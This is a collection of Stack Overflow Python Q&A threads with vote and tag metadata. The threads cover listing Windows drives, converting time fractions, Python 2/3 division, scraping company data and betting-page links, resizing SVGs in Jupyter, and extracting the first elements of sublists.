featurability...\nYes, I'm not following Windows standard path conventions ('\\\\')... \nIn all my years of using python, I've had no problems with '/' anywhere paths are used, and have made it standard in my programs.\n", "This code will return of list of drivenames and letters, for example:\n['Gateway(C:)', 'EOS_DIGITAL(L:)', 'Music Archive(O:)']\nIt only uses the standard library. It builds on a few ideas I found above.\nwindll.kernel32.GetVolumeInformationW() returns 0 if the disk drive is empty, a CD rom without a disk for example. 
This code does not list these empty drives.\nThese 2 lines capture the letters of all of the drives:\nbitmask = (bin(windll.kernel32.GetLogicalDrives())[2:])[::-1] # strip off leading 0b and reverse\ndrive_letters = [ascii_uppercase[i] + ':/' for i, v in enumerate(bitmask) if v == '1']\n\nHere is the full routine:\nfrom ctypes import windll, create_unicode_buffer, c_wchar_p, sizeof\nfrom string import ascii_uppercase\n\ndef get_win_drive_names():\n volumeNameBuffer = create_unicode_buffer(1024)\n fileSystemNameBuffer = create_unicode_buffer(1024)\n serial_number = None\n max_component_length = None\n file_system_flags = None\n drive_names = []\n # Get the drive letters, then use the letters to get the drive names\n bitmask = (bin(windll.kernel32.GetLogicalDrives())[2:])[::-1] # strip off leading 0b and reverse\n drive_letters = [ascii_uppercase[i] + ':/' for i, v in enumerate(bitmask) if v == '1']\n\n for d in drive_letters:\n rc = windll.kernel32.GetVolumeInformationW(c_wchar_p(d), volumeNameBuffer, sizeof(volumeNameBuffer),\n serial_number, max_component_length, file_system_flags,\n fileSystemNameBuffer, sizeof(fileSystemNameBuffer))\n if rc:\n drive_names.append(f'{volumeNameBuffer.value}({d[:2]})') # disk_name(C:)\n return drive_names\n\n", "This will help to find valid drives in windows os\nimport os\nimport string\ndrive = string.ascii_uppercase\nvalid_drives = []\nfor each_drive in drive:\n if os.path.exist(each_drive+\":\\\\\"):\n print(each_drive)\n valid_drives.append(each_drive+\":\\\\\")\nprint(valid_drives)\n\nThe output will be\nC\nD\nE\n['C:\\\\','D:\\\\','E:\\\\']\n\n", "If you want only the letters for each drive, you can just:\nfrom win32.win32api import GetLogicalDriveStrings\n\n\ndrives = [drive for drive in GetLogicalDriveStrings()[0]]\n\n", "As I don't have win32api installed on my field of notebooks I used this solution using wmic:\nimport subprocess\nimport string\n\n#define alphabet\nalphabet = []\nfor i in string.ascii_uppercase:\n alphabet.append(i + ':')\n\n#get letters that are mounted somewhere\nmounted_letters = subprocess.Popen(\"wmic logicaldisk get name\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n#erase mounted letters from alphabet in nested loop\nfor line in mounted_letters.stdout.readlines():\n if \"Name\" in line:\n continue\n for letter in alphabet:\n if letter in line:\n print 'Deleting letter %s from free alphabet %s' % letter\n alphabet.pop(alphabet.index(letter))\n\nprint alphabet\n\nalternatively you can get the difference from both list like this simpler solution (after launching wmic subprocess as mounted_letters):\n#get output to list\nmounted_letters_list = []\nfor line in mounted_letters.stdout.readlines():\n if \"Name\" in line:\n continue\n mounted_letters_list.append(line.strip())\n\nrest = list(set(alphabet) - set(mounted_letters_list))\nrest.sort()\nprint rest\n\nboth solutions are similiarly fast, yet I guess set list is better for some reason, right?\n", "if you don't want to worry about cross platform issues, including those across python platforms such as Pypy, and want something decently performative to be used when drives are updated during runtime:\n>>> from os.path import exists\n>>> from sys import platform\n>>> drives = ''.join( l for l in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if exists('%s:/'%l) ) if platform=='win32' else ''\n>>> drives\n'CZ'\n\nhere's my performance test of this code:\n4000 iterations; threshold of min + 
250ns:\n__________________________________________________________________________________________________________code___|_______min______|_______max______|_______avg______|_efficiency\n⡇⠀⠀⢀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⣷⣷⣶⣼⣶⣴⣴⣤⣤⣧⣤⣤⣠⣠⣤⣤⣶⣤⣤⣄⣠⣦⣤⣠⣤⣤⣤⣤⣄⣠⣤⣠⣤⣤⣠⣤⣤⣤⣤⣤⣤⣄⣤⣤⣄⣤⣄⣤⣠⣀⣀⣤⣄⣤⢀⣀⢀⣠⣠⣀⣀⣤⣀⣠\n drives = ''.join( l for l in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' if exists('%s:/'%l) ) if platform=='win32' else '' | 290.049ns | 1975.975ns | 349.911ns | 82.892%\n\n", "List hard drives using command prompt windows in python\nSimilarly, you can do it for Linux with a few changes\nimport os,re\nregex = r\"([^\\s]*:)\"\ndriver = os.popen(\"wmic logicaldisk get name\").read()\n\nprint(re.findall(regex, driver))\n\nsample output:\n['A:', 'C:', 'D:', 'E:', 'F:', 'G:', 'H:', 'I:', 'J:', 'L:']\n\n" ]
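One caveat worth adding to the answers above: several of them are Python 2 era — string.uppercase and the print statement do not exist in Python 3. A sketch of the same ctypes bitmask approach, updated for Python 3:

import string
from ctypes import windll  # Windows only

def get_drives():
    drives = []
    bitmask = windll.kernel32.GetLogicalDrives()
    for letter in string.ascii_uppercase:
        if bitmask & 1:
            drives.append(letter)
        bitmask >>= 1
    return drives

print(get_drives())  # e.g. ['C', 'D']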
[ 75, 73, 24, 19, 14, 10, 7, 4, 3, 3, 1, 1, 1, 1, 1, 0, 0, 0 ]
[]
[]
[ "python", "windows" ]
stackoverflow_0000827371_python_windows.txt
Q: Convert between hh:mm:ss time and a float that is a fraction of 24 hours I receive times (hh:mm:ss) as floats - e.g. 18:52:18 is a float 0.786331018518518. I managed to calculate the time from a float value with this code: val = 0.786331018518518 hour = int(val*24) minute = int((val*24-hour)*60) seconds = int(((val*24-hour)*60-minute)*60) print(f"{hour}:{minute}:{seconds}") How is it possible to calculate the float value from a time - so from 18:52:18 to 0.786331018518518? And generally, isn't there an easier way to convert in both directions between float and time (I was thinking about the datetime module but was not able to find anything for this)? A: What you have is an amount of time, in day units. You can use datetime.timedelta, which represents a duration val = 0.786331018518518 d = timedelta(days=val) print(d) # 18:52:19 val = d.total_seconds() / 86400 print(val) # 0.7863310185185185 From your hour/minute/seconds variables it would be print(hour / 24 + minute / 1440 + seconds / 86400) A: I'm assuming the float value is the time in days. To get the float value from a time, you can convert each of the parts (hours, minutes, seconds) to days and add them all up. So hours/24+minutes/60/24+seconds/60/60/24 would work.
Convert between hh:mm:ss time and a float that is a fraction of 24 hours
I receive times (hh:mm:ss) as floats - e.g. 18:52:18 is a float 0.786331018518518. I managed to calculate the time from a float value with this code: val = 0.786331018518518 hour = int(val*24) minute = int((val*24-hour)*60) seconds = int(((val*24-hour)*60-minute)*60) print(f"{hour}:{minute}:{seconds}") How is it possible to calculate the float value from a time - so from 18:52:18 to 0.786331018518518? And generally, isn't there an easier way to convert in both directions between float and time (I was thinking about the datetime module but was not able to find anything for this)?
[ "What you have is an amount of time, in day unit\nYou can use datetime.timedelta that represents a duration\nval = 0.786331018518518\nd = timedelta(days=val)\nprint(d) # 18:52:19\n\nval = d.total_seconds() / 86400\nprint(val) # 0.7863310185185185\n\n\nFrom your hour/minute/seconds variables it would be\nprint(hour / 24 + minute / 1440 + seconds / 86400)\n\n", "I'm assuming the float-value is the time in days.\nTo get the float-value from time, you can convert each of them (hours, minutes, seconds) to days and add them all up.\nSo hours/24+minutes/60/24+seconds/60/60/24 would work.\n" ]
[ 3, 1 ]
[]
[]
[ "datetime", "python" ]
stackoverflow_0074593414_datetime_python.txt
Q: Python Version Creates Different Dictionaries I have a script which needs to be compatible with both Python 2 and 3. The code utilizes a dictionary which is generated using the following line of code: x = {2**x-1: 1-1/8*x if x>0 else -1 for x in range(0,9)} In Python 3.6.8, the dictionary is: >>> x {0: -1, 1: 0.875, 3: 0.75, 7: 0.625, 15: 0.5, 31: 0.375, 63: 0.25, 127: 0.125, 255: 0.0} In Python 2.7.5, the dictionary is: >>> x {0: -1, 1: 1, 3: 1, 7: 1, 15: 1, 31: 1, 63: 1, 127: 1, 255: 1} The dictionary generated in Python 3 is the desired output. To generate the correct dictionary values in Python 2, I have tried float(1-1/8*x) 1-float(1/8*x) 1-1/8*float(x) without success. I would greatly appreciate insight into why this behavior occurs. Thank you very much. A: The solution I found that is compatible with both versions of Python is: x = {2**x-1: 1-float(x)/8 if x>0 else -1 for x in range(0,9)}
Python Version Creates Different Dictionaries
I have a script which needs to be compatible with both Python 2 and 3. The code utilizes a dictionary which is generated using the following line of code: x = {2**x-1: 1-1/8*x if x>0 else -1 for x in range(0,9)} In Python 3.6.8, the dictionary is: >>> x {0: -1, 1: 0.875, 3: 0.75, 7: 0.625, 15: 0.5, 31: 0.375, 63: 0.25, 127: 0.125, 255: 0.0} In Python 2.7.5, the dictionary is: >>> x {0: -1, 1: 1, 3: 1, 7: 1, 15: 1, 31: 1, 63: 1, 127: 1, 255: 1} The dictionary generated in Python 3 is the desired output. To generate the correct dictionary values in Python 2, I have tried float(1-1/8*x) 1-float(1/8*x) 1-1/8*float(x) without success. I would greatly appreciate insight into why this behavior occurs. Thank you very much.
[ "The solution I found that is compatible for both versions of Python is:\nx = {2**x-1: 1-float(x)/8 if x>0 else -1 for x in range(0,9)}\n\n" ]
[ 1 ]
[]
[]
[ "dictionary", "floating_point", "python", "python_2.7", "python_3.x" ]
stackoverflow_0074593472_dictionary_floating_point_python_python_2.7_python_3.x.txt
Q: scrape the overview I wonder why I cannot scrape this company overview. An example is that I want to scrape Walmart's size, which is 10000+ employees. Below is my code, not sure why the info I am looking for is not there... import requests from bs4 import BeautifulSoup import pandas as pd headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.80 Safari/537.36'} url = f'https://www.glassdoor.com/Overview/Working-at-Walmart-EI_IE715.11,18.htm' # f'https://www.glassdoor.com/Reviews/Google-Engineering-Reviews-EI_IE9079.0,6_DEPT1007_IP{pg}.htm?sort.sortType=RD&sort.ascending=false&filter.iso3Language=eng' r = requests.get(url, headers) soup = BeautifulSoup(r.content, 'html.parser') I deeply appreciate any help to scrape this "size" factor on the company webpage. A: Here is one possible solution: import re import json import requests from bs4 import BeautifulSoup headers = { 'user-agent': 'Mozilla/5.0' } with requests.Session() as session: session.headers.update(headers) raw_data = session.get(f'https://www.glassdoor.com/Overview/Working-at-Walmart-EI_IE715.htm').text script = [s.text for s in BeautifulSoup(raw_data, "lxml").find_all("script") if "window.appCache" in s.text][0] json_data = json.loads(re.findall(r'(\"Employer:\d+\":)(.+)(,\"ROOT_QUERY\")', script)[0][1]) data = { "id": json_data["id"], "shortName": json_data["shortName"], "website": json_data["website"], "type": json_data["type"], "revenue": json_data["revenue"], "headquarters": json_data["headquarters"], "size": json_data["size"], "yearFounded": json_data["yearFounded"] } print(data) Output: { 'id': 715, 'shortName': 'Walmart', 'website': 'careers.walmart.com', 'type': 'Company - Public', 'revenue': '$10+ billion (USD)', 'headquarters': 'Bentonville, AR', 'size': '10000+ Employees', 'yearFounded': 1962 } If you only need "size" then just use e.g. size = json_data["size"]
scrape the overview
I wonder why I cannot scrape this company overview. An example is that I want to scrape Walmart's size, which is 10000+ employees. Below is my code, not sure why the info I am looking for is not there... import requests from bs4 import BeautifulSoup import pandas as pd headers = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.80 Safari/537.36'} url = f'https://www.glassdoor.com/Overview/Working-at-Walmart-EI_IE715.11,18.htm' # f'https://www.glassdoor.com/Reviews/Google-Engineering-Reviews-EI_IE9079.0,6_DEPT1007_IP{pg}.htm?sort.sortType=RD&sort.ascending=false&filter.iso3Language=eng' r = requests.get(url, headers) soup = BeautifulSoup(r.content, 'html.parser') I deeply appreciate any help to scrape this "size" factor on the company webpage.
[ "Here is one possible solution:\nimport re\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nheaders = {\n 'user-agent': 'Mozilla/5.0'\n}\n\nwith requests.Session() as session:\n session.headers.update(headers)\n raw_data = session.get(f'https://www.glassdoor.com/Overview/Working-at-Walmart-EI_IE715.htm').text\n \n script = [s.text for s in BeautifulSoup(raw_data, \"lxml\").find_all(\"script\") if \"window.appCache\" in s.text][0]\n json_data = json.loads(re.findall(r'(\\\"Employer:\\d+\\\":)(.+)(,\\\"ROOT_QUERY\\\")', script)[0][1])\n\n data = {\n \"id\": json_data[\"id\"],\n \"shortName\": json_data[\"shortName\"],\n \"website\": json_data[\"website\"],\n \"type\": json_data[\"type\"],\n \"revenue\": json_data[\"revenue\"],\n \"headquarters\": json_data[\"headquarters\"],\n \"size\": json_data[\"size\"],\n \"yearFounded\": json_data[\"yearFounded\"]\n }\n \n print(data)\n\nOutput:\n{\n 'id': 715,\n 'shortName': 'Walmart',\n 'website': 'careers.walmart.com',\n 'type': 'Company - Public',\n 'revenue': '$10+ billion (USD)',\n 'headquarters': 'Bentonville, AR',\n 'size': '10000+ Employees',\n 'yearFounded': 1962\n}\n\nIf you only need \"size\" then just use e.g. size = json_data[\"size\"]\n" ]
[ 0 ]
[]
[]
[ "beautifulsoup", "python", "selenium", "web_scraping" ]
stackoverflow_0074588025_beautifulsoup_python_selenium_web_scraping.txt
Q: How to resize / rescale a SVG graphic in an iPython / Jupyter Notebook? I've a large SVG (.svg graphic) object to display in a iPython / Jupyter Notebook. In fact, I've a large neural network model graphic created with Keras to display. from IPython.display import SVG from keras.utils.vis_utils import model_to_dot SVG(model_to_dot(model,show_shapes=True).create(prog='dot', format='svg')) So, I want to resize / rescale / shrink the SVG graphic to fit in my Notebook page (particularly horizontally, since the page width is limited). A: Another option is to use the "dpi" (dots per inch) property. A little hacky but this allowed me to shrink my SVG. Tensorflow: model_to_doc from IPython.display import SVG from keras.utils import model_to_dot SVG(model_to_dot(model, show_shapes= True, show_layer_names=True, dpi=65).create(prog='dot', format='svg')) A: A new improved solution particularly useful using spaCy, (tested with the version 2.2.4). In order to be able to scale the .svg without cropping, we must add a viewBox to the XML / HTML svg representation. Before scaling: import spacy import re from spacy import displacy nlp_model = spacy.load("en_core_web_sm") doc = nlp_model(u"To be or not to be, that is the question") svg = displacy.render(doc, style='dep', page=True, jupyter=False) def add_viewbox_svg(svg): regex = r'class="displacy" width="([\d\.]*)" height="([\d\.]*)' match_results = re.findall(regex,svg) new_svg = svg.replace("<svg ","<svg viewBox='0 0 "+ match_results[0][0]+" "+ match_results[0][1]+ "' preserveAspectRatio='none' ") return new_svg new_svg = add_viewbox_svg(svg) Then using style: style = "<style>svg{width:100% !important;height:100% !important;</style>" display(HTML(style)) display(HTML(new_svg)) After scaling: A: This is what worked for me: from IPython.display import SVG, display, HTML import base64 _html_template='<img width="{}" src="data:image/svg+xml;base64,{}" >' def svg_to_fixed_width_html_image(svg, width="100%"): text = _html_template.format(width, base64.b64encode(svg)) return HTML(text) svg_to_fixed_width_html_image(svg) A: Above CSS-based workaround does not seem to work for me, as both width= and height= were directly set in attribute of generated SVG element. As an additional workaround, here's what I got: iv1_dot = model_to_dot(iv1_model, show_shapes=False, show_layer_names=False, rankdir='LR') iv1_dot.set_size('48x8') SVG(iv1_dot.create(prog=['dot'], format='svg')) This allowed me to specify size of graphviz drawing in inch (48x8, in above case). A: The answers above and below are really good but depends upon the system. They might or might not work for you always depending upon your browser plugins, Jupyter version, Colab environment, etc. Generally, SVG() converts the dot image to an SVG file but it is tricky to adjust the size of that by customizing the associating HTML. What I'd suggest is using this: from keras.utils import plot_model plot_model(model, to_file='model.png') You can then use the snippet in the above answer by user48956 to adjust the size of the image generated. But most of the time, it scales on its own. Further Reference: Here A: The other solutions all had some issues for my use case. 
I thus propose this solution which manipulates the svg data directly using BeautifulSoup: from IPython.display import SVG from bs4 import BeautifulSoup import re def scale_svg(svg_object, scale=1.0): soup = BeautifulSoup(svg_object.data, 'lxml') svg_elt = soup.find("svg") w = svg_elt.attrs["width"].rstrip("pt") h = svg_elt.attrs["height"].rstrip("pt") ws = float(w)*scale hs = float(h)*scale svg_elt.attrs["width"] = f"{ws}pt" svg_elt.attrs["height"] = f"{hs}pt" svg_elt.attrs["viewbox"] = f"0.00 0.00 {ws} {hs}" g_elt = svg_elt.find("g") tf = g_elt.attrs["transform"] # non-greedy regex-search-and-replace tf2 = re.sub( "scale\(.*?\)", f"scale({scale} {scale})", tf ) g_elt.attrs["transform"] = tf2 svg_object.data = str(svg_elt) return svg_object s1 = SVG(""" <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" height="103.0pt" viewbox="0.00 0.00 170.0 103.0" width="170.0pt"> <g class="graph" id="graph0" transform="scale(1.0 1.0) rotate(0) translate(4 199)"> <title>G</title> <polygon fill="#ffffff" points="-4,4 -4,-199 166,-199 166,4 -4,4" stroke="transparent"/> <!-- node0000 --> <g class="node" id="node1"> <title>node0000</title> <ellipse cx="81" cy="-159" fill="none" rx="36" ry="36" stroke="#000000"/> <text fill="#000000" font-family="Times,serif" font-size="10.00" text-anchor="middle" x="81" y="-156.5">ABCDEFGH</text> </g> </g> </svg> """) scale_svg(s1, 3.2) A: To add to user48956's answer, the above only works if your SVG is already a string. For SVGs loaded from file, use this: svg_to_fixed_width_html_image(SVG('example.svg').data.encode('ascii'), width="100%")
How to resize / rescale an SVG graphic in an IPython / Jupyter Notebook?
I have a large SVG (.svg graphic) object to display in an IPython / Jupyter Notebook. In fact, I have a large neural network model graphic created with Keras to display. from IPython.display import SVG from keras.utils.vis_utils import model_to_dot SVG(model_to_dot(model,show_shapes=True).create(prog='dot', format='svg')) So, I want to resize / rescale / shrink the SVG graphic to fit in my Notebook page (particularly horizontally, since the page width is limited).
[ "Another option is to use the \"dpi\" (dots per inch) property. A little hacky but this allowed me to shrink my SVG. \nTensorflow: model_to_doc\n from IPython.display import SVG\n from keras.utils import model_to_dot\n\n SVG(model_to_dot(model, show_shapes= True, show_layer_names=True, dpi=65).create(prog='dot', format='svg'))\n\n", "A new improved solution particularly useful using spaCy, (tested with the version 2.2.4). In order to be able to scale the .svg without cropping, we must add a viewBox to the XML / HTML svg representation.\nBefore scaling:\n\nimport spacy\nimport re\nfrom spacy import displacy\n\nnlp_model = spacy.load(\"en_core_web_sm\")\ndoc = nlp_model(u\"To be or not to be, that is the question\")\nsvg = displacy.render(doc, style='dep', page=True, jupyter=False)\n\ndef add_viewbox_svg(svg):\n regex = r'class=\"displacy\" width=\"([\\d\\.]*)\" height=\"([\\d\\.]*)'\n match_results = re.findall(regex,svg)\n new_svg = svg.replace(\"<svg \",\"<svg viewBox='0 0 \"+\n match_results[0][0]+\" \"+\n match_results[0][1]+\n \"' preserveAspectRatio='none' \")\n return new_svg\n\nnew_svg = add_viewbox_svg(svg)\n\nThen using style:\nstyle = \"<style>svg{width:100% !important;height:100% !important;</style>\"\ndisplay(HTML(style))\ndisplay(HTML(new_svg))\n\nAfter scaling:\n\n", "This is what worked for me:\nfrom IPython.display import SVG, display, HTML\nimport base64\n_html_template='<img width=\"{}\" src=\"data:image/svg+xml;base64,{}\" >'\n\ndef svg_to_fixed_width_html_image(svg, width=\"100%\"):\n text = _html_template.format(width, base64.b64encode(svg))\n return HTML(text)\n\nsvg_to_fixed_width_html_image(svg)\n\n\n", "Above CSS-based workaround does not seem to work for me, as both width= and height= were directly set in attribute of generated SVG element.\nAs an additional workaround, here's what I got:\niv1_dot = model_to_dot(iv1_model, show_shapes=False, show_layer_names=False, rankdir='LR')\niv1_dot.set_size('48x8')\nSVG(iv1_dot.create(prog=['dot'], format='svg'))\n\nThis allowed me to specify size of graphviz drawing in inch (48x8, in above case).\n", "The answers above and below are really good but depends upon the system. They might or might not work for you always depending upon your browser plugins, Jupyter version, Colab environment, etc. Generally, SVG() converts the dot image to an SVG file but it is tricky to adjust the size of that by customizing the associating HTML. What I'd suggest is using this:\nfrom keras.utils import plot_model\nplot_model(model, to_file='model.png')\n\nYou can then use the snippet in the above answer by user48956 to adjust the size of the image generated. But most of the time, it scales on its own.\nFurther Reference: Here\n", "The other solutions all had some issues for my use case. 
I thus propose this solution which manipulates the svg data directly using BeautifulSoup:\nfrom IPython.display import SVG\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef scale_svg(svg_object, scale=1.0):\n\n soup = BeautifulSoup(svg_object.data, 'lxml')\n svg_elt = soup.find(\"svg\")\n w = svg_elt.attrs[\"width\"].rstrip(\"pt\")\n h = svg_elt.attrs[\"height\"].rstrip(\"pt\")\n\n ws = float(w)*scale\n hs = float(h)*scale\n\n svg_elt.attrs[\"width\"] = f\"{ws}pt\"\n svg_elt.attrs[\"height\"] = f\"{hs}pt\"\n svg_elt.attrs[\"viewbox\"] = f\"0.00 0.00 {ws} {hs}\"\n\n g_elt = svg_elt.find(\"g\")\n tf = g_elt.attrs[\"transform\"]\n # non-greedy regex-search-and-replace\n tf2 = re.sub(\n \"scale\\(.*?\\)\",\n f\"scale({scale} {scale})\",\n tf\n )\n g_elt.attrs[\"transform\"] = tf2\n\n svg_object.data = str(svg_elt)\n \n return svg_object\n\ns1 = SVG(\"\"\"\n<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" height=\"103.0pt\" viewbox=\"0.00 0.00 170.0 103.0\" width=\"170.0pt\">\n<g class=\"graph\" id=\"graph0\" transform=\"scale(1.0 1.0) rotate(0) translate(4 199)\">\n<title>G</title>\n<polygon fill=\"#ffffff\" points=\"-4,4 -4,-199 166,-199 166,4 -4,4\" stroke=\"transparent\"/>\n<!-- node0000 -->\n<g class=\"node\" id=\"node1\">\n<title>node0000</title>\n<ellipse cx=\"81\" cy=\"-159\" fill=\"none\" rx=\"36\" ry=\"36\" stroke=\"#000000\"/>\n<text fill=\"#000000\" font-family=\"Times,serif\" font-size=\"10.00\" text-anchor=\"middle\" x=\"81\" y=\"-156.5\">ABCDEFGH</text>\n</g>\n</g>\n</svg>\n\"\"\")\n\nscale_svg(s1, 3.2)\n\n", "To add to user48956's answer, the above only works if your SVG is already a string.\nFor SVGs loaded from file, use this:\nsvg_to_fixed_width_html_image(SVG('example.svg').data.encode('ascii'), width=\"100%\")\n\n\n" ]
[ 12, 5, 3, 0, 0, 0, 0 ]
[]
[]
[ "jupyter_notebook", "keras", "python", "svg" ]
stackoverflow_0051452569_jupyter_notebook_keras_python_svg.txt
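A lighter-weight variation on the BeautifulSoup answer above, for cases where only the outer dimensions need to change: rewrite the width/height attributes with the standard-library re module. This is only a sketch; the function name scale_svg_str is made up for illustration, and it assumes the attributes are literally formatted as "<number>pt", as in Graphviz output. Unlike scale_svg above it does not touch the inner transform or viewBox, so it relies on a viewBox already being present for the renderer to rescale the drawing.
import re

def scale_svg_str(svg_text, scale=1.0):
    # Multiply every width="NNpt" / height="NNpt" attribute by `scale`.
    # With a viewBox present, the renderer rescales the drawing to the new box.
    def bump(match):
        name, value = match.group(1), float(match.group(2))
        return f'{name}="{value * scale}pt"'
    return re.sub(r'\b(width|height)="([\d.]+)pt"', bump, svg_text)

Usage would look like SVG(scale_svg_str(svg_object.data, 0.5)) for an existing IPython SVG object.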
Q: List of the first item in a sublist
I want a list that displays the first element of the sublists I input.
def firstelements(w):
    return [item[0] for item in w]

Which works, but when I try doing firstelements([[10,10],[3,5],[]]) there's an error because of the []. How can I fix this?
A: Add a condition to your list comprehension so that empty lists are skipped.
def firstelements(w):
    return [item[0] for item in w if item != []]

If you wish to represent that empty list with something but don't want an error, you might use a conditional expression in your list comprehension.
def firstelements(w):
    return [item[0] if item != [] else None for item in w]

>>> firstelements([[10,10],[3,5],[]])
[10, 3, None]

A: Add a condition to check if the item has data.
def firstelements(w):
    return [item[0] for item in w if item]

Below are 3 more ways you can write it that don't require a condition. filter strips out None/"empty" values.
def firstelements(w):
    return list(zip(*filter(None, w)))[0]

def firstelements(w):
    return [item[0] for item in filter(None, w)]

def firstelements(w):
    return [i for (i, *_) in filter(None, w)]
List of the first item in a sublist
I want a list that displays the first element of the sublists I input. def firstelements(w): return [item[0] for item in w] Which works, but when I try doing firstelements([[10,10],[3,5],[]]) there's an error because of the []. How can I fix this?
[ "Add a condition to your list comprehension so that empty lists are skipped.\ndef firstelements(w):\n return [item[0] for item in w if item != []]\n\nIf you wish to represent that empty list with something but don't want an error you might use a conditional expression in your list comprehension.\ndef firstelements(w):\n return [item[0] if item != [] else None for item in w]\n\n>>> firstelements([[10,10],[3,5],[]])\n[10, 3, None]\n\n", "Add a condition to check if the item has data.\ndef firstelements(w):\n return [item[0] for item in w if item]\n\nBelow are 3 more ways you can write it that don't require a condition. filter strips out None/\"Empty\" values.\ndef firstelements(w):\n return list(zip(*filter(None, w)))[0]\n\ndef firstelements(w):\n return [item[0] for item in filter(None, w)]\n\ndef firstelements(w):\n return [i for (i,*_) in filter(None, w)]\n\n" ]
[ 2, 1 ]
[]
[]
[ "python" ]
stackoverflow_0074593459_python.txt
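A related one-liner worth noting, not taken from the answers above: next() with a default collapses both cases (skip versus placeholder) into a single expression. The default parameter here is an illustrative addition.
def firstelements(w, default=None):
    # next() returns `default` instead of raising StopIteration on an empty sublist
    return [next(iter(item), default) for item in w]

print(firstelements([[10, 10], [3, 5], []]))  # [10, 3, None]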
Q: Retrieving specific matches from a list in python
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from time import sleep
from datetime import datetime
import pandas as pd
import warnings
import os

os.chdir('C:/Users/paulc/Documents/Medium Football')
warnings.filterwarnings('ignore')

base_url = 'https://www.sportingindex.com/spread-betting/football/international-world-cup'
option = Options()
option.headless = False
driver = webdriver.Chrome("C:/Users/paulc/Documents/Medium Football/chromedriver.exe",options=option)
driver.get(base_url)

links = [elem.get_attribute("href") for elem in driver.find_elements(By.TAG_NAME,"a")]

This code retrieves all the href links on this page. I want to search the links list and return only the matches that contain 'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a'. However, I get the AttributeError: 'NoneType' object has no attribute 'startswith' using
import re
[x for x in links if x.startswith('https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]

Help is appreciated.
A: Instead of collecting all a elements on the page, where there will be a lot of irrelevant results, you can use a more precise locator.
So, instead of
driver.find_elements(By.TAG_NAME,"a")

use this:
driver.find_elements(By.XPATH,"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]")

This will give you the desired elements only.
And this
links = [elem.get_attribute("href") for elem in driver.find_elements(By.XPATH,"//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]")]

will directly give you the wanted links only.
UPD
In case this is giving you an empty list, you are possibly missing a delay. So, you can simply add some pause before that line, like time.sleep(2), but it's better to use WebDriverWait expected_conditions explicit waits for that.
I can't check it since my computer is blocking that link due to my company policy since that is a gambling site, but normally something like this should work: from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.common.by import By from selenium.webdriver.support import expected_conditions as EC wait = WebDriverWait(driver, 10) links = [elem.get_attribute("href") for elem in wait.until(EC.visibility_of_all_elements_located((By.XPATH, "//a[contains(@href,'https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a')]")))] A: The following code is filtering to grab the right links import time from bs4 import BeautifulSoup import pandas as pd from selenium.webdriver.chrome.service import Service from selenium import webdriver webdriver_service = Service("./chromedriver") #Your chromedriver path driver = webdriver.Chrome(service=webdriver_service) driver.get('https://www.sportingindex.com/spread-betting/football/international-world-cup') driver.maximize_window() time.sleep(8) soup = BeautifulSoup(driver.page_source,"lxml") for u in soup.select('a[class="gatracking"]'): link = 'https://www.sportingindex.com' + u.get('href') if '-v-' in link: print(link) Output: https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.24fdf8f5-b69b-4341-b6b4-d27605f7f7fd/spain-v-germany https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.c9bdf787-791a-47e0-b77c-a2d4cf567bfd/cameroon-v-serbia https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5eddaa44-666b-47dc-8a0f-4ac758de00dc/south-korea-v-ghana https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.70cefd39-60f7-415e-9cb5-7a56acd403d6/brazil-v-switzerland https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7fe0285e-366f-4f3c-b77f-4c96077a6c71/portugal-v-uruguay https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.dd7a995d-7478-45f8-af27-9f234d37cc76/ecuador-v-senegal https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.92232207-0f1e-4bb1-bacd-1332ef6b9007/netherlands-v-qatar https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.b913620e-69c7-4606-a153-7b48589b7c94/iran-v-usa https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.7a4a18fb-d4ee-4880-849f-f1afdea33cd5/wales-v-england https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.20c098b4-4e97-4fd1-97b0-f42d84424361/australia-v-denmark https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.5a7476e2-8d35-4a8e-8065-b4339e79f395/tunisia-v-france https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.8a869f02-9dd0-49c5-91bd-209ee224fc2a/poland-v-argentina https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.6379b787-f246-4ba4-a896-28a97396d02f/saudi-arabia-v-mexico https://www.sportingindex.com/spread-betting/football/international-world-cup/group_a.52737cfd-da19-42dd-b15b-c16c3e8e9a86/canada-v-morocco 